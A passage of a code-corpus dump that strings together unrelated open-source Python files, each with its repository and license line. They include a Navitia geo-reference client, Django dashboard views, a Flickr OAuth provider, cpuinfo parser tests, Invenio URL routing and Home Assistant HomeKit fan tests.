'scriptname': 'iris.R',
'funcname': 'train.randomForest',
'encode_labels': True,
},
'model_persister': {
'!': 'palladium.persistence.CachedUpdatePersister',
'impl': {
'!': 'palladium.persistence.Database',
'url': 'sqlite:///iris-model.db',
},
},
'predict_service': {
'!': 'palladium.server.PredictService',
'mapping': [
('sepal length', 'float'),
('sepal width', 'float'),
('petal length', 'float'),
('petal width', 'float'),
],
},
}
| ottogroup/palladium | examples/R/config-iris.py | Python | apache-2.0 | 1,050 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from navitiacommon import request_pb2, type_pb2
class Kraken(object):
def __init__(self, instance):
self.instance = instance
def get_stop_points(self, place, mode, max_duration, reverse=False):
req = request_pb2.Request()
req.requested_api = type_pb2.nearest_stop_points
req.nearest_stop_points.place = place
req.nearest_stop_points.mode = mode
req.nearest_stop_points.reverse = reverse
req.nearest_stop_points.max_duration = max_duration
req.nearest_stop_points.walking_speed = self.instance.walking_speed
req.nearest_stop_points.bike_speed = self.instance.bike_speed
req.nearest_stop_points.bss_speed = self.instance.bss_speed
req.nearest_stop_points.car_speed = self.instance.car_speed
result = self.instance.send_and_receive(req)
nsp = {}
for item in result.nearest_stop_points:
nsp[item.stop_point.uri] = item.access_duration
return nsp
def place(self, place):
req = request_pb2.Request()
req.requested_api = type_pb2.place_uri
req.place_uri.uri = place
response = self.instance.send_and_receive(req)
return response.places[0]
| TeXitoi/navitia | source/jormungandr/jormungandr/georef.py | Python | agpl-3.0 | 2,419 |
# Copyright (c) 2001-2019, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
class EquipmentsProviderMock(object):
def __init__(self, url, timeout=2, **kwargs):
self.url = url
self.timeout = timeout
| pbougue/navitia | source/jormungandr/jormungandr/equipments/tests/equipment_provider_mock.py | Python | agpl-3.0 | 1,421 |
# PopGen 1.1 is A Synthetic Population Generator for Advanced
# Microsimulation Models of Travel Demand
# Copyright (C) 2009, Arizona State University
# See PopGen/License
import adjusting_pums_joint_distribution
import numpy
def ipf_config_run (db, synthesis_type, control_variables, dimensions, pumano, tract, bg):
dbc = db.cursor()
# Creating objective joint distributions to match the resulting sunthetic populations against
adjusting_pums_joint_distribution.create_joint_dist(db, synthesis_type, control_variables, dimensions, pumano, tract, bg)
adjusting_pums_joint_distribution.adjust_weights(db, synthesis_type, control_variables, pumano, tract, bg)
order_dummy = adjusting_pums_joint_distribution.create_aggregation_string(control_variables)
dbc.execute('select frequency from %s_%s_joint_dist where tract = %s and bg = %s order by %s'%(synthesis_type, pumano, tract, bg, order_dummy))
objective_frequency = numpy.asarray(dbc.fetchall())
# Creating the joint distributions corrected for Zero-cell and Zero-marginal problems
# Example puma x composite_type adjustment for the synthesis type obtained as a parameter
adjusting_pums_joint_distribution.create_joint_dist(db, synthesis_type, control_variables, dimensions, pumano, tract, bg)
adjusting_pums_joint_distribution.create_adjusted_frequencies(db, synthesis_type, control_variables, pumano, tract, bg)
adjusting_pums_joint_distribution.adjust_weights(db, synthesis_type, control_variables, pumano, tract, bg)
dbc.execute('select frequency from %s_%s_joint_dist where tract = %s and bg = %s order by %s'%(synthesis_type, pumano, tract, bg, order_dummy))
estimated_constraint = numpy.asarray(dbc.fetchall())
return objective_frequency, estimated_constraint
| christianurich/VIBe2UrbanSim | 3rdparty/opus/src/synthesizer/command_line_algorithm/ipf.py | Python | gpl-2.0 | 1,792 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
from django.shortcuts import render, redirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.conf import settings
from workup.models import ClinicDate
from pttrack.models import Patient
def dashboard_dispatch(request):
"""Redirect an incoming user to the appropriate dashboard.
Falls back to the 'home' url.
"""
provider_type = request.session['clintype_pk']
dashboard_dispatch = settings.OSLER_PROVIDERTYPE_DASHBOARDS
if provider_type in dashboard_dispatch:
return redirect(dashboard_dispatch[provider_type])
else:
return redirect(settings.OSLER_DEFAULT_DASHBOARD)
def dashboard_attending(request):
provider = request.user.provider
clinic_list = ClinicDate.objects.filter(workup__attending=provider)
paginator = Paginator(clinic_list, settings.OSLER_CLINIC_DAYS_PER_PAGE,
allow_empty_first_page=True)
page = request.GET.get('page')
try:
clinics = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
clinics = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
clinics = paginator.page(paginator.num_pages)
no_note_patients = Patient.objects.filter(workup=None).order_by('-pk')[:20]
return render(request,
'dashboard/dashboard-attending.html',
{'clinics': clinics,
'no_note_patients': no_note_patients
})
| SaturdayNeighborhoodHealthClinic/osler | dashboard/views.py | Python | gpl-3.0 | 1,655 |
import json
from flickrapi import FlickrAPI
from djpcms.contrib.social import OAuthProvider
DEFAULT_FLICKR_PERMISSION = 'read'
class Flickr(OAuthProvider):
AUTHORIZATION_URL = 'http://www.flickr.com/services/auth/'
def extra_request_parameters(self):
perms = getattr(self.settings,'FLICKR_PERMISSION',DEFAULT_FLICKR_PERMISSION)
return {'perms':perms}
def fetch_request_token(self, callback, **kwargs):
return None
def fetch_authentication_uri(self, rtoken, **kwargs):
api = FlickrAPI(*self.tokens)
params = self.extra_request_parameters()
params['api_key'] = self.tokens[0]
data = api.encode_and_sign(params)
return '{0}?{1}'.format(self.authorisation_url(**kwargs),data)
def quick_access_token(self, data):
api = self._get_api()
frob = data.get('frob',None)
res = api.auth_getToken(frob=frob)
res = json.loads(res[14:-1])
return res['auth']
def get_access_token_key(self, access_token):
return access_token['token']['_content']
def user_data(self, access_token):
token = self.get_access_token_key(access_token)
uuid = access_token['user']['nsid']
api = self.authenticated_api(token)
res = json.loads(api.people_getInfo(user_id = uuid)[14:-1])
return res,token,''
def authenticated_api(self, key, secret = None):
return self._get_api(token = key)
def _get_api(self, token = None):
kwargs = {'format':'json','token':token}
return FlickrAPI(*self.tokens, **kwargs)
def get_user_details(self, response):
response = response['person']
name = response['realname']['_content']
return {'uid': response['nsid'],
'email': '',
'username': response['username']['_content'],
'fullname': name,
'first_name': name,
'description': '',
'location': response['location']['_content'],
'url': response['profileurl']['_content']}
| strogo/djpcms | djpcms/contrib/social/providers/flickr.py | Python | bsd-3-clause | 2,116 |
class Solution:
# @param num, a list of integer
# @return an integer
def findPeakElement(self, num):
size = len(num) - 1
if size == 0:
return 0
if num[0] > num[1]:
return 0
if num[size] > num[size-1]:
return size
return self.findPeak(num, 0, len(num)-1)
def findPeak(self, num, left, right):
print num[left: right+1]
if right-left < 2:
return -1
center = (left + right) / 2
if num[center] > num[center-1] and num[center] > num[center+1]:
return center
r_left = self.findPeak(num, left, center)
if r_left >= 0:
return r_left
r_right = self.findPeak(num, center, right)
if r_right >= 0:
return r_right
return -1
if __name__ == "__main__":
s = Solution()
tests = [(1,), (1, 2, 3, 1, 4), (1, 2, 3)]
for test in tests:
print s.findPeakElement(test)
| Crayzero/LeetCodeProgramming | Solutions/Find Peak Element/FindPeakElement.py | Python | mit | 979 |
"""Module for unittesting dmidecode methods"""
import unittest
from hwinfo.host.cpuinfo import CPUInfoParser
DATA_DIR = 'hwinfo/host/tests/data'
class CPUInfoParserTests(unittest.TestCase):
DATA = """
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 30
model name : Intel(R) Xeon(R) CPU X3430 @ 2.40GHz
stepping : 5
microcode : 0x3
cpu MHz : 2394.052
cache size : 8192 KB
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu de tsc msr pae mce cx8 apic sep mca cmov pat clflush acpi mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl nonstop_tsc pni monitor vmx est ssse3 cx16 sse4_1 sse4_2 popcnt hypervisor lahf_lm dtherm tpr_shadow vnmi flexpriority ept vpid
bogomips : 4788.10
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
"""
DATA_REC = {
'processor': '0',
'vendor_id': 'GenuineIntel',
'cpu_family': '6',
'model': '30',
'model_name': 'Intel(R) Xeon(R) CPU X3430 @ 2.40GHz',
'stepping': '5',
'microcode': '0x3',
'cpu_mhz': '2394.052',
'cache_size': '8192 KB',
'fpu': 'yes',
'fpu_exception': 'yes',
'cpuid_level': '11',
'wp': 'yes',
'flags': 'fpu de tsc msr pae mce cx8 apic sep mca cmov pat clflush acpi mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl nonstop_tsc pni monitor vmx est ssse3 cx16 sse4_1 sse4_2 popcnt hypervisor lahf_lm dtherm tpr_shadow vnmi flexpriority ept vpid',
'bogomips': '4788.10',
'clflush_size': '64',
'cache_alignment': '64',
'address_sizes': '36 bits physical, 48 bits virtual',
'power_management': '',
}
def setUp(self):
self.parser = CPUInfoParser(self.DATA.strip())
def _assert_equal(self, key):
rec = self.parser.parse_items()[0]
return self.assertEqual(rec[key], self.DATA_REC[key])
def test_cpuinfo_processor(self):
return self._assert_equal('processor')
def test_vendor_id(self):
return self._assert_equal('vendor_id')
def test_cpu_family(self):
return self._assert_equal('cpu_family')
def test_model(self):
return self._assert_equal('model')
def test_model_name(self):
return self._assert_equal('model_name')
def test_stepping(self):
return self._assert_equal('stepping')
def test_microcode(self):
return self._assert_equal('microcode')
def test_cpu_mhz(self):
return self._assert_equal('cpu_mhz')
def test_cache_size(self):
return self._assert_equal('cache_size')
def test_fpu(self):
return self._assert_equal('fpu')
def test_fpu_exception(self):
return self._assert_equal('fpu_exception')
def test_cpuid_level(self):
return self._assert_equal('cpuid_level')
def test_wp(self):
return self._assert_equal('wp')
def test_flags(self):
return self._assert_equal('flags')
def test_bogomips(self):
return self._assert_equal('bogomips')
def test_clflush_size(self):
return self._assert_equal('clflush_size')
def test_cache_alignment(self):
return self._assert_equal('cache_alignment')
def test_address_sizes(self):
return self._assert_equal('address_sizes')
class CPUInfoMultipleParseTest(unittest.TestCase):
DATA_FILE = "%s/cpuinfo" % DATA_DIR
def setUp(self):
fh = open(self.DATA_FILE)
data = fh.read()
fh.close()
self.parser = CPUInfoParser(data)
def test_number_of_processors(self):
recs = self.parser.parse_items()
self.assertEqual(len(recs), 4)
| Revolution1/ohei | ohei/utils/hwinfo/host/tests/test_cpuinfo.py | Python | mit | 3,733 |
# Copyright (c) 2009, 2010, 2011, 2016 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import uuid
import six
from six.moves import range
from ovs.db import error
import ovs.db.parser
uuidRE = re.compile("^xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx$"
.replace('x', '[0-9a-fA-F]'))
def zero():
return uuid.UUID(int=0)
def is_valid_string(s):
return uuidRE.match(s) is not None
def from_string(s):
if not is_valid_string(s):
raise error.Error("%s is not a valid UUID" % s)
return uuid.UUID(s)
def from_json(json, symtab=None):
try:
s = ovs.db.parser.unwrap_json(json, "uuid", six.string_types, "string")
if not uuidRE.match(s):
raise error.Error("\"%s\" is not a valid UUID" % s, json)
return uuid.UUID(s)
except error.Error as e:
if not symtab:
raise e
try:
name = ovs.db.parser.unwrap_json(json, "named-uuid",
six.string_types, "string")
except error.Error:
raise e
if name not in symtab:
symtab[name] = uuid.uuid4()
return symtab[name]
def to_json(uuid_):
return ["uuid", str(uuid_)]
def to_c_initializer(uuid_, var):
hex_string = uuid_.hex
parts = ["0x%s" % (hex_string[x * 8:(x + 1) * 8])
for x in range(4)]
return "{ %s }," % ", ".join(parts)
| ejschiller/FLEX | ovs/python/ovs/ovsuuid.py | Python | gpl-3.0 | 1,929 |
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example updates a product's notes.
To determine which products exist, run get_all_products.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
PRODUCT_ID = 'INSERT_PRODUCT_ID_HERE'
def main(client, product_id):
# Initialize appropriate service.
product_service = client.GetService('ProductService', version='v201502')
# Create statement object to select a single product by an ID.
values = [{
'key': 'id',
'value': {
'xsi_type': 'NumberValue',
'value': product_id
}
}]
query = 'WHERE id = :id'
statement = dfp.FilterStatement(query, values, 1)
# Get products by statement.
response = product_service.getProductsByStatement(statement.ToStatement())
if 'results' in response:
# Update each local product object by changing its notes.
updated_products = []
for product in response['results']:
product['notes'] = 'Product needs further review before activation.'
updated_products.append(product)
# Update products remotely.
products = product_service.updateProducts(updated_products)
# Display results.
if products:
for product in products:
print ('Product with id \'%s\', name \'%s\', and '
'notes \'%s\' was updated.'
% (product['id'], product['name'], product['notes']))
else:
print 'No products were updated.'
else:
print 'No products found to update.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, PRODUCT_ID)
| richardfergie/googleads-python-lib | examples/dfp/v201502/product_service/update_products.py | Python | apache-2.0 | 2,221 |
#! /usr/bin/env python
########################################################################
# File : dirac-admin-kill-pilot
# Author : A.T.
########################################################################
"""
Kill the specified pilot
"""
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
Script.setUsageMessage('\n'.join([__doc__.split('\n')[1],
'Usage:',
' %s <pilot reference>' % Script.scriptName]))
Script.parseCommandLine(ignoreErrors=True)
args = Script.getPositionalArgs()
if len(args) < 1:
Script.showHelp()
pilotRef = args[0]
from DIRAC.Interfaces.API.DiracAdmin import DiracAdmin
diracAdmin = DiracAdmin()
exitCode = 0
result = diracAdmin.killPilot(pilotRef)
if not result['OK']:
DIRAC.gLogger.error('Failed to kill pilot', pilotRef)
DIRAC.gLogger.error(result['Message'])
exitCode = 1
DIRAC.exit(exitCode)
| andresailer/DIRAC | WorkloadManagementSystem/scripts/dirac-admin-kill-pilot.py | Python | gpl-3.0 | 937 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Posix Status Module.
Module that implements the Abstract Status class for the posix
archive backend type.
"""
from ..abstract.status import AbstractStatus
class PosixStatus(AbstractStatus):
"""Posix Status Class.
Class for handling posix status pieces
needs mtime,ctime, bytes per level array.
"""
_disk = 'disk'
def __init__(self, mtime, ctime, bytes_per_level, filesize):
"""Constructor for posix status class."""
super(PosixStatus, self).__init__(
mtime,
ctime,
bytes_per_level,
filesize
)
self.mtime = mtime
self.ctime = ctime
self.bytes_per_level = bytes_per_level
self.filesize = filesize
self.filepath = None
self.defined_levels = self.define_levels()
self.file_storage_media = self.find_file_storage_media()
def find_file_storage_media(self):
"""Get the file storage media. Showed always be disk for posix."""
level_array = self.defined_levels
disk_level = 0
return level_array[disk_level]
def define_levels(self):
"""Set up what each level definition means."""
# This defines posix integer levels. Always disk
type_per_level = [self._disk]
return type_per_level
def set_filepath(self, filepath):
"""Set the filepath that the status is for."""
self.filepath = filepath
| dmlb2000/pacifica-archiveinterface | pacifica/archiveinterface/backends/posix/status.py | Python | lgpl-3.0 | 1,478 |
import base64
import imghdr
import six
import uuid
from django.core.files.base import ContentFile
from rest_framework import serializers
from .models import Scholar, Record
class ScholarSerializer(serializers.ModelSerializer):
class Meta:
model = Scholar
fields = (
'pk',
'photo',
'name',
'sex',
'birth_date',
'school_class',
'is_studying')
class RecordSerializer(serializers.ModelSerializer):
class Meta:
model = Record
fields = (
'pk',
'scholar',
'date',
'has_came_with',
'time_arrived',
'time_departed'
)
| mxmaslin/Test-tasks | django_test_tasks/old_django_test_tasks/apps/playschool/serializers.py | Python | gpl-3.0 | 721 |
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Global organisation of the application's URLs.
This module binds together Invenio's modules and maps them to
their corresponding URLs (ie, /search to the websearch modules,...)
"""
from invenio.ext.legacy.handler import create_handler
from invenio.ext.logging import register_exception
from invenio.ext.legacy.handler import WebInterfaceDirectory
from invenio.utils import apache
from invenio.config import CFG_DEVEL_SITE, CFG_ACCESS_CONTROL_LEVEL_SITE
from invenio.legacy.registry import webinterface_proxy, webinterfaces
class WebInterfaceDeprecatedPages(WebInterfaceDirectory):
"""Implement dumb interface for deprecated pages."""
_exports = ['']
def __call__(self, req, form):
"""Return deprecation warning."""
try:
from invenio.legacy.webpage import page
except ImportError:
register_exception()
page = lambda * args: args[1]
req.status = apache.HTTP_SERVICE_UNAVAILABLE
msg = "<p>This functionality will be soon deprecated.</p>"
try:
from invenio.config import CFG_SITE_ADMIN_EMAIL
msg += """<p>If you would still like to use it, please ask your
Invenio administrator <code>%s</code> to consider enabling it.
</p>""" % CFG_SITE_ADMIN_EMAIL
except ImportError:
pass
try:
return page('Service disabled', msg, req=req)
except:
return msg
def _lookup(self, component, path):
"""Return current interface for given path."""
return WebInterfaceDeprecatedPages(), path
index = __call__
class WebInterfaceDisabledPages(WebInterfaceDirectory):
"""This class implements a dumb interface to use as a fallback in case the
site is switched to read only mode, i.e. CFG_ACCESS_CONTROL_LEVEL_SITE > 0"""
_exports = ['']
def __call__(self, req, form):
try:
from invenio.legacy.webpage import page
except ImportError:
register_exception()
page = lambda * args: args[1]
req.status = apache.HTTP_SERVICE_UNAVAILABLE
msg = "<p>This functionality is currently unavailable due to a service maintenance.</p>"
try:
from invenio.config import CFG_SITE_ADMIN_EMAIL
msg += """<p>You can contact <code>%s</code>
in case of questions.</p>""" % \
CFG_SITE_ADMIN_EMAIL
except ImportError:
pass
msg += """<p>We are going to restore the service soon.</p>
<p>Sorry for the inconvenience.</p>"""
try:
return page('Service unavailable', msg, req=req)
except:
return msg
def _lookup(self, component, path):
return WebInterfaceDisabledPages(), path
index = __call__
class WebInterfaceDumbPages(WebInterfaceDirectory):
"""This class implements a dumb interface to use as a fallback in case of
errors importing particular module pages."""
_exports = ['']
def __call__(self, req, form):
try:
from invenio.legacy.webpage import page
except ImportError:
page = lambda * args: args[1]
req.status = apache.HTTP_INTERNAL_SERVER_ERROR
msg = "<p>This functionality is experiencing a temporary failure.</p>"
msg += "<p>The administrator has been informed about the problem.</p>"
try:
from invenio.config import CFG_SITE_ADMIN_EMAIL
msg += """<p>You can contact <code>%s</code>
in case of questions.</p>""" % \
CFG_SITE_ADMIN_EMAIL
except ImportError:
pass
msg += """<p>We hope to restore the service soon.</p>
<p>Sorry for the inconvenience.</p>"""
try:
return page('Service failure', msg, req=req)
except:
return msg
def _lookup(self, component, path):
return WebInterfaceDumbPages(), path
index = __call__
try:
from invenio.legacy.bibdocfile.webinterface import bibdocfile_legacy_getfile
except:
register_exception(alert_admin=True, subject='EMERGENCY')
bibdocfile_legacy_getfile = WebInterfaceDumbPages
try:
from invenio.legacy.websearch.webinterface import WebInterfaceSearchInterfacePages
except:
register_exception(alert_admin=True, subject='EMERGENCY')
WebInterfaceSearchInterfacePages = WebInterfaceDumbPages
try:
from invenio.legacy.bibcirculation.admin_webinterface import \
WebInterfaceBibCirculationAdminPages
except:
register_exception(alert_admin=True, subject='EMERGENCY')
WebInterfaceBibCirculationAdminPages = WebInterfaceDumbPages
try:
from invenio.legacy.bibsched.webinterface import \
WebInterfaceBibSchedPages
except:
register_exception(alert_admin=True, subject='EMERGENCY')
WebInterfaceBibSchedPages = WebInterfaceDumbPages
if CFG_DEVEL_SITE:
test_exports = ['httptest']
else:
test_exports = []
class WebInterfaceAdminPages(WebInterfaceDirectory):
"""This class implements /admin2 admin pages."""
_exports = ['index', 'bibcirculation', 'bibsched']
def index(self, req, form):
return "FIXME: return /help/admin content"
bibcirculation = WebInterfaceBibCirculationAdminPages()
bibsched = WebInterfaceBibSchedPages()
class WebInterfaceInvenio(WebInterfaceSearchInterfacePages):
""" The global URL layout is composed of the search API plus all
the other modules."""
_exports = WebInterfaceSearchInterfacePages._exports + \
[
'youraccount',
'youralerts',
'yourbaskets',
'yourmessages',
'yourloans',
'yourcomments',
'ill',
'yourgroups',
'yourtickets',
'comments',
'error',
'oai2d', ('oai2d.py', 'oai2d'),
('getfile.py', 'getfile'),
'submit',
'rss',
'stats',
'journal',
'help',
'unapi',
'exporter',
'kb',
'batchuploader',
'bibsword',
'ping',
'admin2',
'linkbacks',
'textmining',
'goto',
'info',
'authorlist',
] + test_exports
def __init__(self):
self.getfile = bibdocfile_legacy_getfile
if CFG_DEVEL_SITE:
self.httptest = webinterfaces.get('WebInterfaceHTTPTestPages',
WebInterfaceDisabledPages)()
_mapping = dict(
submit='WebInterfaceSubmitPages',
youraccount='WebInterfaceYourAccountPages',
youralerts='WebInterfaceYourAlertsPages',
yourbaskets='WebInterfaceYourBasketsPages',
yourmessages='WebInterfaceYourMessagesPages',
yourloans='WebInterfaceYourLoansPages',
ill='WebInterfaceILLPages',
yourgroups='WebInterfaceYourGroupsPages',
yourtickets='WebInterfaceYourTicketsPages',
comments='WebInterfaceCommentsPages',
error='WebInterfaceErrorPages',
oai2d='WebInterfaceOAIProviderPages',
rss='WebInterfaceRSSFeedServicePages',
stats='WebInterfaceStatsPages',
journal='WebInterfaceJournalPages',
help='WebInterfaceDocumentationPages',
info='WebInterfaceInfoPages',
unapi='WebInterfaceUnAPIPages',
exporter='WebInterfaceFieldExporterPages',
kb='WebInterfaceBibKnowledgePages',
admin2='WebInterfaceAdminPages',
batchuploader='WebInterfaceBatchUploaderPages',
bibsword='WebInterfaceSword',
ping='WebInterfacePingPages',
linkbacks='WebInterfaceRecentLinkbacksPages',
textmining='WebInterfaceDocExtract',
yourcomments='WebInterfaceYourCommentsPages',
goto='WebInterfaceGotoPages',
authorlist='WebInterfaceAuthorlistPages',
)
def __new__(cls):
from flask import current_app
if CFG_ACCESS_CONTROL_LEVEL_SITE > 0:
for key in cls._mapping.keys():
setattr(cls, key, WebInterfaceDisabledPages())
else:
webinterfaces_ = dict(webinterfaces)
webinterfaces_['WebInterfaceAdminPages'] = WebInterfaceAdminPages
for key, value in cls._mapping.items():
if value in webinterfaces_:
setattr(cls, key, webinterfaces_[value]())
else:
current_app.logger.error(
"Can not load {name}.".format(name=value))
setattr(cls, key, WebInterfaceDeprecatedPages())
return super(WebInterfaceInvenio, cls).__new__(cls)
# This creates the 'handler' function, which will be invoked directly
# by mod_python.
invenio_handler = create_handler(WebInterfaceInvenio())
| crepererum/invenio | invenio/ext/legacy/layout.py | Python | gpl-2.0 | 9,951 |
"""Test different accessory types: Fans."""
from pyhap.const import HAP_REPR_AID, HAP_REPR_CHARS, HAP_REPR_IID, HAP_REPR_VALUE
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_OSCILLATING,
ATTR_PERCENTAGE,
ATTR_PERCENTAGE_STEP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN,
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_PRESET_MODE,
SUPPORT_SET_SPEED,
)
from homeassistant.components.homekit.const import ATTR_VALUE, PROP_MIN_STEP
from homeassistant.components.homekit.type_fans import Fan
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
EVENT_HOMEASSISTANT_START,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
)
from homeassistant.core import CoreState
from homeassistant.helpers import entity_registry as er
from tests.common import async_mock_service
async def test_fan_basic(hass, hk_driver, events):
"""Test fan with char state."""
entity_id = "fan.demo"
hass.states.async_set(entity_id, STATE_ON, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.aid == 1
assert acc.category == 3 # Fan
assert acc.char_active.value == 1
# If there are no speed_list values, then HomeKit speed is unsupported
assert acc.char_speed is None
await acc.run()
await hass.async_block_till_done()
assert acc.char_active.value == 1
hass.states.async_set(entity_id, STATE_OFF, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_set(entity_id, STATE_UNKNOWN)
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_remove(entity_id)
await hass.async_block_till_done()
assert acc.char_active.value == 0
# Set from HomeKit
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_on
assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is None
hass.states.async_set(entity_id, STATE_ON)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is None
async def test_fan_direction(hass, hk_driver, events):
"""Test fan with direction."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_DIRECTION, ATTR_DIRECTION: DIRECTION_FORWARD},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_direction.value == 0
await acc.run()
await hass.async_block_till_done()
assert acc.char_direction.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_DIRECTION: DIRECTION_REVERSE})
await hass.async_block_till_done()
assert acc.char_direction.value == 1
# Set from HomeKit
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_FORWARD
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == DIRECTION_FORWARD
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_direction.client_update_value, 1)
await hass.async_block_till_done()
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] == DIRECTION_REVERSE
async def test_fan_oscillate(hass, hk_driver, events):
"""Test fan with oscillate."""
